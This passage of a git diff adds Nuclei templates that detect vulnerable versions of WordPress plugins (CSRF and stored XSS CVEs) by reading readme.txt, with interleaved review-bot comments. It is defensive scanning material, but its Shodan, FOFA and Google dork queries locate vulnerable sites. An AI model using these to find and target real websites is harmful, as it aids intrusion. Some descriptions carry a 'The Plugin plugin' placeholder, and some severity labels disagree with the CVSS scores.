\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53769-15f79e5b8994448885f3d02862f03b54.yaml b/poc/cve/CVE-2024-53769-15f79e5b8994448885f3d02862f03b54.yaml
new file mode 100644
index 0000000000..5a549181e6
--- /dev/null
+++ b/poc/cve/CVE-2024-53769-15f79e5b8994448885f3d02862f03b54.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53769-15f79e5b8994448885f3d02862f03b54
+
+info:
+ name: >
+ Custom Post Type to Map Store <= 1.1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Custom Post Type to Map Store plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ea5c0b48-7e8e-492e-b0de-14681e31fe85?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53769
+ metadata:
+ fofa-query: "wp-content/plugins/cpt-to-map-store/"
+ google-query: inurl:"/wp-content/plugins/cpt-to-map-store/"
+ shodan-query: 'vuln:CVE-2024-53769'
+ tags: cve,wordpress,wp-plugin,cpt-to-map-store,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cpt-to-map-store/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cpt-to-map-store"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53770-dde24fdaf6fdccf92776b21600160051.yaml b/poc/cve/CVE-2024-53770-dde24fdaf6fdccf92776b21600160051.yaml
new file mode 100644
index 0000000000..4664bbb8e9
--- /dev/null
+++ b/poc/cve/CVE-2024-53770-dde24fdaf6fdccf92776b21600160051.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53770-dde24fdaf6fdccf92776b21600160051
+
+info:
+ name: >
+ RingCentral Communications <= 1.6.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The RingCentral Communications Plugin – FREE plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/de4ba999-3312-4bcc-ab87-574b7994e07e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-53770
+ metadata:
+ fofa-query: "wp-content/plugins/rccp-free/"
+ google-query: inurl:"/wp-content/plugins/rccp-free/"
+ shodan-query: 'vuln:CVE-2024-53770'
+ tags: cve,wordpress,wp-plugin,rccp-free,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/rccp-free/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "rccp-free"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.1')
\ No newline at end of file
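Review bot: The closing `dsl` matcher decides on the `Stable tag` value read from `readme.txt` alone, so a hit means the readme advertises a version at or below 1.6.1, not that the CSRF flaw was confirmed on the target. A readme whose tag is not numeric (for example `trunk`), or a site that blocks `readme.txt`, yields no `version`, and the template then stays silent on an install that may still be affected. I would say so in the template, for example `# version fingerprint only: confirm the installed plugin version before triage` above `http:`. The two `regex` extractors are identical apart from `internal: true`; a one-line comment that the first apparently feeds the `dsl` matcher and the second only reports the value would explain the duplication. The same layout repeats in the other template hunks of this diff (CVE-2024-53771 through CVE-2024-53786).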
diff --git a/poc/cve/CVE-2024-53771-3e40a710fce8ae1cf756cfd3c23e5785.yaml b/poc/cve/CVE-2024-53771-3e40a710fce8ae1cf756cfd3c23e5785.yaml
new file mode 100644
index 0000000000..8a7721e4e6
--- /dev/null
+++ b/poc/cve/CVE-2024-53771-3e40a710fce8ae1cf756cfd3c23e5785.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53771-3e40a710fce8ae1cf756cfd3c23e5785
+
+info:
+ name: >
+ SimpleSchema <= 1.7.6.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The SimpleSchema plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.7.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/81500371-93d3-4cee-a992-93d2469f5233?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53771
+ metadata:
+ fofa-query: "wp-content/plugins/simpleschema-free/"
+ google-query: inurl:"/wp-content/plugins/simpleschema-free/"
+ shodan-query: 'vuln:CVE-2024-53771'
+ tags: cve,wordpress,wp-plugin,simpleschema-free,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simpleschema-free/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simpleschema-free"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.6.9')
\ No newline at end of file
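Review bot: `severity: low` and the trailing `low` tag disagree with `cvss-score: 6.4` in the `classification` block, which falls in the CVSS v3.1 medium band (4.0–6.9). A scan or dashboard filtered to medium and above would drop this finding. If the downgrade for contributor-level access is deliberate, a comment next to `severity` should say so; otherwise use `severity: medium` and `tags: cve,wordpress,wp-plugin,simpleschema-free,medium`. The same mismatch appears in the hunks for CVE-2024-53772, CVE-2024-53773, CVE-2024-53774 and CVE-2024-53786 (score 6.4), CVE-2024-53783 (4.9), and CVE-2024-53784 and CVE-2024-53785 (4.3).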
diff --git a/poc/cve/CVE-2024-53772-277c760c8d8f4930fc51c04bff87c407.yaml b/poc/cve/CVE-2024-53772-277c760c8d8f4930fc51c04bff87c407.yaml
new file mode 100644
index 0000000000..deaa233dd3
--- /dev/null
+++ b/poc/cve/CVE-2024-53772-277c760c8d8f4930fc51c04bff87c407.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53772-277c760c8d8f4930fc51c04bff87c407
+
+info:
+ name: >
+ Mail Picker <= 1.0.14 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Mail Picker plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4b4de145-bff1-4265-97bf-4085b4112a66?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53772
+ metadata:
+ fofa-query: "wp-content/plugins/mail-picker/"
+ google-query: inurl:"/wp-content/plugins/mail-picker/"
+ shodan-query: 'vuln:CVE-2024-53772'
+ tags: cve,wordpress,wp-plugin,mail-picker,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mail-picker/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mail-picker"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.14')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53773-c70474e6b49675474684415b8bad7136.yaml b/poc/cve/CVE-2024-53773-c70474e6b49675474684415b8bad7136.yaml
new file mode 100644
index 0000000000..2d7d5fa178
--- /dev/null
+++ b/poc/cve/CVE-2024-53773-c70474e6b49675474684415b8bad7136.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53773-c70474e6b49675474684415b8bad7136
+
+info:
+ name: >
+ Znajdź Pracę z Praca.pl <= 2.2.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Znajdź Pracę z Praca.pl plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e618025-f631-48af-b360-e11524e61be3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53773
+ metadata:
+ fofa-query: "wp-content/plugins/znajdz-prace-z-pracapl/"
+ google-query: inurl:"/wp-content/plugins/znajdz-prace-z-pracapl/"
+ shodan-query: 'vuln:CVE-2024-53773'
+ tags: cve,wordpress,wp-plugin,znajdz-prace-z-pracapl,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/znajdz-prace-z-pracapl/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "znajdz-prace-z-pracapl"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53774-eb9fe05556006515a14f186abd44c385.yaml b/poc/cve/CVE-2024-53774-eb9fe05556006515a14f186abd44c385.yaml
new file mode 100644
index 0000000000..d5ddebaf76
--- /dev/null
+++ b/poc/cve/CVE-2024-53774-eb9fe05556006515a14f186abd44c385.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53774-eb9fe05556006515a14f186abd44c385
+
+info:
+ name: >
+ Sparkle Elementor Kit <= 2.0.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Sparkle Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3557cd1e-cfb4-4f08-af3c-be5211a325c1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53774
+ metadata:
+ fofa-query: "wp-content/plugins/sparkle-elementor-kit/"
+ google-query: inurl:"/wp-content/plugins/sparkle-elementor-kit/"
+ shodan-query: 'vuln:CVE-2024-53774'
+ tags: cve,wordpress,wp-plugin,sparkle-elementor-kit,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/sparkle-elementor-kit/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "sparkle-elementor-kit"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53775-27ea91b6010aa9c51cff5259b54c7600.yaml b/poc/cve/CVE-2024-53775-27ea91b6010aa9c51cff5259b54c7600.yaml
new file mode 100644
index 0000000000..d7add19d94
--- /dev/null
+++ b/poc/cve/CVE-2024-53775-27ea91b6010aa9c51cff5259b54c7600.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53775-27ea91b6010aa9c51cff5259b54c7600
+
+info:
+ name: >
+ DancePress (TRWA) <= 3.1.11 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+ The DancePress (TRWA) plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.1.11. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c2bddb3-2b23-4a75-abe2-db787441a1b2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
+ cvss-score: 4.7
+ cve-id: CVE-2024-53775
+ metadata:
+ fofa-query: "wp-content/plugins/dancepress-trwa/"
+ google-query: inurl:"/wp-content/plugins/dancepress-trwa/"
+ shodan-query: 'vuln:CVE-2024-53775'
+ tags: cve,wordpress,wp-plugin,dancepress-trwa,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/dancepress-trwa/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "dancepress-trwa"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.11')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53776-be68d5e8752ad62ee640890ae13d0500.yaml b/poc/cve/CVE-2024-53776-be68d5e8752ad62ee640890ae13d0500.yaml
new file mode 100644
index 0000000000..ef4ac7f334
--- /dev/null
+++ b/poc/cve/CVE-2024-53776-be68d5e8752ad62ee640890ae13d0500.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53776-be68d5e8752ad62ee640890ae13d0500
+
+info:
+ name: >
+ Donate Me <= 1.2.5 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Donate Me plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.5. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7df1901f-fb18-4d1b-ac80-38b676efb64f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53776
+ metadata:
+ fofa-query: "wp-content/plugins/donate-me/"
+ google-query: inurl:"/wp-content/plugins/donate-me/"
+ shodan-query: 'vuln:CVE-2024-53776'
+ tags: cve,wordpress,wp-plugin,donate-me,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/donate-me/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "donate-me"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53777-4cd0625e0e16873871e20b7b67514246.yaml b/poc/cve/CVE-2024-53777-4cd0625e0e16873871e20b7b67514246.yaml
new file mode 100644
index 0000000000..830d548b9e
--- /dev/null
+++ b/poc/cve/CVE-2024-53777-4cd0625e0e16873871e20b7b67514246.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53777-4cd0625e0e16873871e20b7b67514246
+
+info:
+ name: >
+ Simple Header and Footer <= 1.0.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Simple Header and Footer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b253378-beba-4e31-bf1f-0352fdf98ab5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53777
+ metadata:
+ fofa-query: "wp-content/plugins/simple-header-and-footer/"
+ google-query: inurl:"/wp-content/plugins/simple-header-and-footer/"
+ shodan-query: 'vuln:CVE-2024-53777'
+ tags: cve,wordpress,wp-plugin,simple-header-and-footer,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-header-and-footer/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simple-header-and-footer"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53778-f21730b86a71afb64088be9a871cf272.yaml b/poc/cve/CVE-2024-53778-f21730b86a71afb64088be9a871cf272.yaml
new file mode 100644
index 0000000000..6db825c1e4
--- /dev/null
+++ b/poc/cve/CVE-2024-53778-f21730b86a71afb64088be9a871cf272.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53778-f21730b86a71afb64088be9a871cf272
+
+info:
+ name: >
+ Essential Breadcrumbs <= 1.1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3d4838b8-7a9d-43b7-a577-7d7ae8bac5fa?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53778
+ metadata:
+ fofa-query: "wp-content/plugins/essential-breadcrumbs/"
+ google-query: inurl:"/wp-content/plugins/essential-breadcrumbs/"
+ shodan-query: 'vuln:CVE-2024-53778'
+ tags: cve,wordpress,wp-plugin,essential-breadcrumbs,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/essential-breadcrumbs/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "essential-breadcrumbs"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.1')
\ No newline at end of file
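Review bot: The `description` opens with "The Plugin plugin for WordPress", a placeholder where the product name belongs; `name` and the request path identify the product as Essential Breadcrumbs. Anyone triaging from the description alone cannot tell which plugin is affected, so the opening should read `The Essential Breadcrumbs plugin for WordPress is vulnerable to Cross-Site Request Forgery ...`. The hunks for CVE-2024-53781 (SpatialMatch IDX) and CVE-2024-53782 (Photo Video Store) carry the same placeholder and need the same correction with their own names.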
diff --git a/poc/cve/CVE-2024-53779-cdef31c739309ab66ad6f17f25de736a.yaml b/poc/cve/CVE-2024-53779-cdef31c739309ab66ad6f17f25de736a.yaml
new file mode 100644
index 0000000000..56ca0bcce8
--- /dev/null
+++ b/poc/cve/CVE-2024-53779-cdef31c739309ab66ad6f17f25de736a.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53779-cdef31c739309ab66ad6f17f25de736a
+
+info:
+ name: >
+ Yahoo! WebPlayer <= 2.0.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Yahoo! WebPlayer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.6. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5e043348-c0aa-418f-9120-dcf470f92123?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53779
+ metadata:
+ fofa-query: "wp-content/plugins/yahoo-media-player/"
+ google-query: inurl:"/wp-content/plugins/yahoo-media-player/"
+ shodan-query: 'vuln:CVE-2024-53779'
+ tags: cve,wordpress,wp-plugin,yahoo-media-player,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/yahoo-media-player/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "yahoo-media-player"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53780-c8b9d80262e337c12d17be598ed0d8eb.yaml b/poc/cve/CVE-2024-53780-c8b9d80262e337c12d17be598ed0d8eb.yaml
new file mode 100644
index 0000000000..0affd678fa
--- /dev/null
+++ b/poc/cve/CVE-2024-53780-c8b9d80262e337c12d17be598ed0d8eb.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53780-c8b9d80262e337c12d17be598ed0d8eb
+
+info:
+ name: >
+ Load More Posts <= 1.4.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Load More Posts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e45dd9f6-9cc6-42d0-b03f-65fda85425f2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53780
+ metadata:
+ fofa-query: "wp-content/plugins/load-more-posts/"
+ google-query: inurl:"/wp-content/plugins/load-more-posts/"
+ shodan-query: 'vuln:CVE-2024-53780'
+ tags: cve,wordpress,wp-plugin,load-more-posts,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/load-more-posts/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "load-more-posts"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53781-82f815daf3b97e22b7a9510fbb6996a6.yaml b/poc/cve/CVE-2024-53781-82f815daf3b97e22b7a9510fbb6996a6.yaml
new file mode 100644
index 0000000000..5067667c93
--- /dev/null
+++ b/poc/cve/CVE-2024-53781-82f815daf3b97e22b7a9510fbb6996a6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53781-82f815daf3b97e22b7a9510fbb6996a6
+
+info:
+ name: >
+ SpatialMatch IDX <= 3.0.9 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.9. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4f406c82-14e7-468b-8bba-400aefe687b5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53781
+ metadata:
+ fofa-query: "wp-content/plugins/spatialmatch-free-lifestyle-search/"
+ google-query: inurl:"/wp-content/plugins/spatialmatch-free-lifestyle-search/"
+ shodan-query: 'vuln:CVE-2024-53781'
+ tags: cve,wordpress,wp-plugin,spatialmatch-free-lifestyle-search,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/spatialmatch-free-lifestyle-search/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "spatialmatch-free-lifestyle-search"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53782-c20bb4e081676aa3be7f9e7cd4a8a759.yaml b/poc/cve/CVE-2024-53782-c20bb4e081676aa3be7f9e7cd4a8a759.yaml
new file mode 100644
index 0000000000..b05390e76a
--- /dev/null
